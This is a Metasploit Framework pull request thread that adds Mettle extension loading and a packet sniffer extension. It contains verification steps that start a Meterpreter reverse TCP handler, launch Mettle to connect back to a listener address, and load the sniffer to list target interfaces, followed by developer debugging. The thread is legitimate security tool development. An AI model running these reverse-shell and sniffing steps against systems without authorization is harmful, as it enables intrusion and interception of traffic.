### PR TITLE
Mettle Extension Loader support (and sniffer extension!)

### PR DESCRIPTION
**Pull request by pbarry-r7**
This PR contains the Metasploit Framework side for Mettle Extension Loader support, including support for extensions using multiple filename suffixes.  Requires the [associated Mettle payload PR](https://github.com/rapid7/mettle/pull/97) to test.

The verification instructions below contain both the framework 'side' and target 'side', denoted by prefixing commands with a 'MSF' or 'TGT', respectively.

See MS-2774.

## Verification

The following assumes a 64-bit Linux target:

- [x] MSF: start framework `msfconsole`
- [x] MSF: `use exploit/multi/handler`
- [x] MSF: `set payload linux/x64/meterpreter_reverse_tcp`
- [x] MSF: `set lhost <IP addr of interface to listen on>`
- [x] MSF: `set ExitOnSession true`
- [x] MSF: `run` (at this point, you should have a listening handler for the incoming Mettle connection)
- [x] TGT: build mettle `make TARGET=x86_64-linux-musl`
- [x] TGT: copy the resulting extension binary and elf files over to your MSF payloads directory
   `cp build/<tool-os-arch-etc dir>/bin/sniffer.bin <framework dir>/data/meterpreter/ext_server_sniffer.bin`
   `cp build/<tool-os-arch-etc dir>/bin/sniffer <framework dir>/data/meterpreter/ext_server_sniffer.elf`
- [x] TGT: start Mettle `sudo build/x86_64-linux-musl/bin/mettle -u tcp://10.0.2.4:4444 -d3`
- [x] MSF: **Verify** you get a new Meterpreter session
- [x] MSF: connect to new session `sessions -i <session num>`
- [x] MSF: load sniffer extension (ELF) `load sniffer.elf`
- [x] **Verify** no errors on MSF or TGT side
- [x] MSF: get list of network interfaces `sniffer_interfaces`
- [x] MSF: **Verify** a list of network interfaces appears
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

### CODE REVIEW

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb [hunk 1]
```diff
@@ -28,14 +28,26 @@ def initialize(shell)
...
+    #reqs = {
+    #  "sniffer_interfaces" => ['sniffer_interfaces'],
+    #  "sniffer_start" => ['sniffer_capture_start'],
+    #  "sniffer_stop"  => ['sniffer_capture_stop'],
+    #  "sniffer_stats" => ['sniffer_capture_stats'],
+    #  "sniffer_dump"  => ['sniffer_capture_dump'],
+    #  "sniffer_release" => ['sniffer_capture_release']
+    #}
+
+    #filter_commands(all, reqs)
```
Comment (pbarry-r7) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb]: This code didn't work as-expected when I originally tested it (like it showed the sniffer_XXX commands even if they hadn't been loaded by Mettle), I'll give it another go and remove if it's still funky.

Comment (timwr) [reply lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb]: It looks like get_loaded_extension_commands is called before core_loadlib?

Comment (timwr) [reply lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb]: I don't think the sniffer commands show at all with this code in place. core_enumext commands is called before core_loadlib and core_loadlib isn't returning the sniffer commands currently.
hacky fix:
```
diff --git a/mettle/src/coreapi.c b/mettle/src/coreapi.c
index be732cf..0f59379 100644
--- a/mettle/src/coreapi.c
+++ b/mettle/src/coreapi.c
@@ -201,14 +201,16 @@ static struct tlv_packet *core_loadlib(struct tlv_handler_ctx *ctx)
                fd = -1;
 
                if (extension_start(m, full_path, NULL, 0, NULL))
                {
                        log_error("Failed to start extension from file '%s'", full_path);
                        goto done;
                }
+               p = tlv_packet_add_fmt(p, TLV_TYPE_METHOD, "sniffer_interfaces");
+
        }
```

Comment (pbarry-r7) [reply lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb]: Hmm, it's been working for me...  The initial core_enumext() call should be MSF determining the extension isn't already loaded on the target, IIRC.

I need to add some documentation on how it's working under-the-covers, will work on that this morning.  Thank you, @timwr!

**Comment by timwr** [comment]
Great stuff!
```
meterpreter > load sniffer.elf
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces 

1 - 'wlan0' ( usable:true )
...
```
One error I'm seeing is if you do `sessions -K` or `meterpreter> exit` after `load sniffer.elf` the child proc gets stuck on 100% cpu: `100.0  0.0   0:10.87 ext514295.elf` (perhaps stuck on the select() and the write syscall?).
`load sniffer.bin` does not work for me:
```
[11-07-2017 23:00:35.817s] [coreapi.c:161] Loading extension 'ext406930.bin' from binary image
[11-07-2017 23:00:35.818s] [process.c:384] child pid 25412 started
[11-07-2017 23:00:35.819s] [extensions.c:141] logged: [11-07-2017 23:00:35.818s] [process.c:252] exec_image: jumping to 0x7ffff7ebf814 loaded at 0x7ffff7ebc06e


[11-07-2017 23:00:35.960s] [process.c:262] child pid 25412 exited status 139
[11-07-2017 23:00:40.387s] [mettle.c:74] Heartbeat
[11-07-2017 23:00:42.726s] [tlv.c:566] no handler found for method: 'sniffer_interfaces'
```

**Comment by pbarry-r7** [comment]
Oh, snap, that's not good, let me look into the exit...  And the .bin not working, let me look into that, too....

🙇

**Comment by timwr** [comment]
The exit problem seems to be fixed now.
Also `load sniffer.elf` works on aarch64. Will the sniffer.elf/bin binary be inside the mettle payloads gem?

**Comment by timwr** [comment]
`load sniffer.elf` works on aarch64 and `load sniffer` appears to work on osx (with a few tweaks):
```
meterpreter > load sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interfaces

1 - 'en0' ( usable:true )
2 - 'bridge0' ( usable:true )
...
```

**Comment by timwr** [comment]
fyi I've been using these changes to test on OSX:
https://github.com/rapid7/metasploit-framework/compare/master...timwr:extension_loader?expand=1

**Comment by timwr** [comment]
I've approved the mettle side of this and I'm keen to get this out for testing even if doesn't work on every platform/situation.
One thing worth thinking about is the naming convention of the extensions.
I'm not sure about `ext_server_(extension).(suffix)`, perhaps it should include the arch or platform?

p.s I just re-read the description and realised it says copy sniffer.elf to:
`<payloads dir>/data/meterpreter/ext_server_sniffer.elf`, not `<framework dir>/data/meterpreter/ext_server_sniffer.elf`, oops! not sure if that makes a difference.

**Comment by pbarry-r7** [comment]
Hey @timwr, my apologies for missing your recent comments/tweaks here.  The goal would be to have the sniffer extension flavors (elf and bin) in the mettle payloads gem.  As for the naming, I'm definitely open to including platform or arch (similar to how the Windows Meterpreter extensions end in .x86.dll or .x64.dll) in the extension filename, particularly if it helps with usability in framework.  I'm going to test with a mipsel target this weekend (to your point, I'm ready to land knowing it will need more work going forward to support more targets), maybe we can land this coming Monday...?  (will be light activity the rest of this week in our office due to the U.S. Thanksgiving holiday)  Oh, and I do think I need to tweak my Verification instructions above a bit (thx!).

**Comment by timwr** [comment]
Agreed, let's aim to land on Monday :)
Shall I (or you?) go ahead and land the mettle pr to build a gem? It might make testing easier

**Comment by busterb** [comment]
I can do it!

**Comment by timwr** [comment]
p.s The cool thing about the non-bin method is that it's extremely generic and you can in theory drop an extension of any kind e.g x86 on x64.
You could write an extension in python/bash/ruby, and load it on any platform that includes the interpreter :)

**Comment by pbarry-r7** [comment]
Thanks again for your work and suggestions on these related PRs, @timwr!  I'll see if I can squirrel away some time later today to finish up my testing (and then land the mettle side of the PR), would be tomorrow at the very latest...!

**Comment by pbarry-r7** [comment]
Per suggestion from @bcook-r7, the latest commit here works with [this Mettle PR](https://github.com/rapid7/mettle/pull/106).  I did test that a Windows Meterpreter still worked fine with these changes.  :)

**Comment by busterb** [comment]
## Release Notes

This adds binary Meterpreter extension support for Linux / MacOS, etc. targets supported by the mettle payload, as well as an implementation of the sniffer module.

**Comment by acheong08** [comment]
```
meterpreter > sysinfo
Computer     : 172.26.34.145
OS           :  (macOS 11.2.2)
Architecture : x64
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter > load -l
sniffer
meterpreter > load sniffer
Loading extension sniffer... 
[-] Failed to load extension: x86_64-apple-darwin/sniffer.elf not found
meterpreter > load sniffer.elf
Loading extension sniffer.elf...
[-] Failed to load extension: x86_64-apple-darwin/sniffer.elf.elf not found
meterpreter > 
```

**Pull request merged**